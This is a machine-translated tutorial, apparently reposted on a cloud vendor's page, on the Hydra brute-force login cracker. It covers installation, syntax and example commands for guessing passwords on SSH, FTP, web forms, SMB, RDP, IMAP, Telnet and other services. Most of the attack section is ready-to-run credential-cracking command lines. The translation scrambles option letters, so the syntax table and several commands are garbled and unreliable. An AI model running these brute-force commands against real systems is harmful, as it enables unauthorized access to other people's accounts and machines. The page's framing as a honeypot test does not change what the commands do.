Linux Brute Force hack tool Hydra Detailed

Source: Internet
Author: User
Tags imap install openssl lowercase md5 digest nntp snmp

Today to help friends do the honeypot test when using this tool, quite convenient, by the way on the Internet to check the relevant information, meet good text, share to everyone:

First, Introduction

Number one of the biggest security holes is passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules is easy-to-add, beside that, it's flexible and very fast.

Hydra was tested to compile on Linux, Windows/cygwin, Solaris one, FreeBSD 8.1 and OSX, and is made available under GPLv3 W ITH a special OpenSSL license expansion.

Currently this tool supports:
AFP, Cisco AAA, Cisco Auth, Cisco Enable, CVS, Firebird, FTP, Http-form-get, Http-form-post, Http-get, Http-head, Http-pro XY, Https-form-get, Https-form-post, Https-get, Https-head, Http-proxy, ICQ, IMAP, IRC, LDAP, Ms-sql, MYSQL, NCP, NNTP, Or Acle Listener, Oracle SID, Oracle, Pc-anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, Sap/r3, SIP, SMB, SMTP, SM TP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, TeamSpeak (TS2), Telnet, Vmware-auth, VNC and XMPP.

For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 Digest etc. is supported.

This tool was a proof of concept code, to give researchers and security consultants the possiblity to show how easy it Woul D is to gain unauthorized access from the remote to a system.

The program was maintained by Van Hauser and David Maciejak.

The Hackers Choice
Http://www.thc.org/thc-hydra

Second, installation

1. Install dependent packages

    • Ubuntu/debian
Apt-get Install Libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev Libsvn-dev Firebird2.1-dev Libncp-dev Libncurses5-dev Hydra

Debian and Ubuntu releases, the source comes with Hydra, directly with the Apt-get online installation.

    • Redhat/fedora
Yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
    • OpenSuSE
Zypper Install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel Libncurses-devel

In this experiment, the CentOS release 5.6 (Final) was used to install the relevant dependency packages after Yum installation as follows:

2, Hydra installation

# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz# tar zxvf hydra-7.4.1.tar.gz# cd hydra-7.4.1#./configure # Make &A mp;& make Install

#./configure will detect some components of the current system configuration, mainly for the crack support module detection, you can install the corresponding support library and dependent packages as needed.

# make

# make Install

Third, Syntax

# Hydra [[[-L LOGIN|-L file] [-P pass|-p file] | [-c FILE]] [-e NS] [-O FILE] [-T TASKS] [-M FILE [-t TASKS]] [-W Time] [-F] [-S PORT] [-S] [-vv]server service [OPT]

-R
Continue to break from last progress

-S
Uppercase with SSL link

-S <PORT>
lowercase, you can specify a nondefault port with this parameter

-L <LOGIN>
Specify cracked users, cracked for specific users

-L <FILE>
Specify a dictionary of user names

-P <PASS>
lowercase, specifying password cracking, less use, usually using a password dictionary

-P <FILE>
Uppercase, specifying the password dictionary

-E <ns>
Optional options, N: null password heuristic, s: heuristic with specified user and password

-C <FILE>
Use colon split format, such as "Login: Password" instead of-l/-p parameter

M <FILE>
Specify the target list file one line at a

-O <FILE>
Specify the result output file

-F
After using the-m parameter, find the first login or password to abort the break

-T <TASKS>
The number of concurrently running threads, default to 16

W <TIME>
Set the maximum time to timeout, in seconds, by default is 30s

-V/-V
Show detailed procedures

Server
Destination IP

Service
Specify service name, supported services and protocols: Telnet FTP POP3[-NTLM] IMAP[-NTLM] SMB smbnt http[s]-{head|get} http-{get|post}-form http-proxy Cisco Cisco-enable VNC ldap2 ldap3 MSSQL mysql oracle-listener postgres NNTP socks5 rexec rlogin pcnfs snmp rsh CVS svn ICQ sapr 3 Ssh2 SMTP-AUTH[-NTLM] pcanywhere teamspeak SIP VMAUTHD Firebird NCP AFP et cetera

Opt
Options available

Iv. examples

1, manually create the user name dictionary and password dictionary, here just to demonstrate, only a few user names and weak password. When really cracked, a powerful dictionary needs to be generated using the Cipher dictionary generator.

2. hack ssh:

# hydra-l users.txt-p password.txt-t 1-vv-e ns 192.168.1.104 SSH

Crack success, direct display results.

You can also specify the result output file using the-o option.

# hydra-l users.txt-p password.txt-t 1-vv-e ns-o save.log 192.168.1.104 ssh

V. Other types of password cracking

    • Hack ftp:
# Hydra IP ftp-l user name-p password Dictionary-t thread (default)-vv# Hydra IP ftp-l user name-p password Dictionary-e ns-vv
    • Get way to commit, hack Web login:
# hydra-l User name-p password Dictionary-t thread-vv-e NS IP http-get/admin/# hydra-l user name-p password Dictionary-t thread-vv-e ns-f IP http-get/admin/i ndex.php
    • Post mode submission, Hack Web login:

The strength of the software is to support a variety of protocol cracking, but also support the Web user interface of the login crack, get form submitted by simple, here through the Post method to submit password cracking provide ideas. A bad thing about this tool is that if the target website is logged in, it will be impossible to hack the code. Break with parameters as follows:

<form action= "index.php" method= "POST" ><input type= "text" name= "name"/><br><br><input type= "Password" name= "pwd"/><br><br><input type= "Submit" Name= "sub" value= "Submit" ></form>

Assuming that you have one of these password login forms, we execute the command:

# hydra-l admin-p pass.lst-o ok.lst-t 1-f 127.0.0.1 http-post-form "Index.php:name=^user^&pwd=^pass^:<title> ;invalido</title> "

  Description: cracked user name is admin, Password dictionary is pass.lst, the cracked result saved in Ok.lst,-t is the number of simultaneous threads for 1,-f is when cracked a password on stop, IP is local, is the destination IP, Http-post-form means the hack is a form password hack submitted using the Post form of HTTP.

The following parameter is the Name property of the corresponding form field in the Web page, and the following <title> is the return information hint that represents the error guess, which can be customized.

    • Hack https:
# hydra-m/index.php-l muts-p pass.txt 10.36.16.18 HTTPS
    • Crack TeamSpeak:
# hydra-l User name-p password Dictionary-s port number-VV IP teamspeak
    • Crack Cisco:
# hydra-p pass.txt 10.36.16.18 cisco# hydra-m cloud-p pass.txt 10.36.16.18 cisco-enable
    • Crack SMB:
# hydra-l administrator-p pass.txt 10.36.16.18 SMB
    • Crack POP3:
# hydra-l muts-p pass.txt my.pop3.mail POP3
    • Hack RDP:
# Hydra IP rdp-l administrator-p pass.txt-v
    • Crack Http-proxy:
# hydra-l Admin-p pass.txt http-proxy://10.36.16.18
    • Hack IMAP:
# HYDRA-L USER.TXT-P Secret 10.36.16.18 IMAP plain# hydra-c defaults.txt-6 Imap://[fe80::2c:31ff:fe12:ac11]:143/plain
    • Hack telnet
# Hydra IP telnet-l user-p password dictionary-t 32-s 23-e ns-f-V

Vi. Summary

This tool is far more powerful than the above test, its password can be cracked key lies in a powerful dictionary, for social work-type infiltration, sometimes can get a multiplier effect.

Linux Brute Force hack tool Hydra Detailed

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.